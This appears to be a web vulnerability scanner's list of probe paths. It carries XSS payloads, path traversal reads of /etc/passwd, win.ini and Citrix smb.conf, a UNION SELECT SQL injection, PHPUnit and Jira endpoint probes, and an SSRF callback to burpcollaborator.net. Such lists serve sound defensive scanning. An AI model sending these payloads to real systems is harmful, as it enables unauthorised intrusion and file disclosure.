/cgi
/test.cgi
/debug.cgi
/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E
/verify.php?id=1&confirm_hash=
/mantis/verify.php?id=1&confirm_hash=
/mantisBT/verify.php?id=1&confirm_hash=
/bugs/verify.php?confirm_hash=&id=1
/static/../../../a/../../../../etc/passwd
/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/phpunit
/vendor/phpunit/phpunit/phpunit
/api/vendor/phpunit/phpunit/phpunit
/apps/vendor/phpunit/phpunit/phpunit
/backup/vendor/phpunit/phpunit/phpunit
/oldsite/vendor/phpunit/phpunit/phpunit
/lib/phpunit/phpunit/phpunit
/modules/vendor/phpunit/phpunit/phpunit
/old/vendor/phpunit/phpunit/phpunit
/zend/vendor/phpunit/phpunit/phpunit
/yii/vendor/phpunit/phpunit/phpunit
/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(
/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(
/plugins/servlet/oauth/users/icon
/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1
/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd
/web/static/c
/base/static/c
/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini
/debug/pprof/
/plugin/build
/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
//secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
/getFavicon?host=burpcollaborator.net
/wp
/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd
/mobile/error
/INF/maven/com.atlassian.jira/atlassian
/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd
/sell
/api/snapshots
/secure/ContactAdministrators!default.jspa
/zabbix.php?action=dashboard.view&dashboardid=1
/webapp/?fccc0\>5f43d=1
/data/autosuggest
/admin/data/autosuggest
/vpn/../vpns/cfg/smb.conf
/share/page/dologin
/Login?!>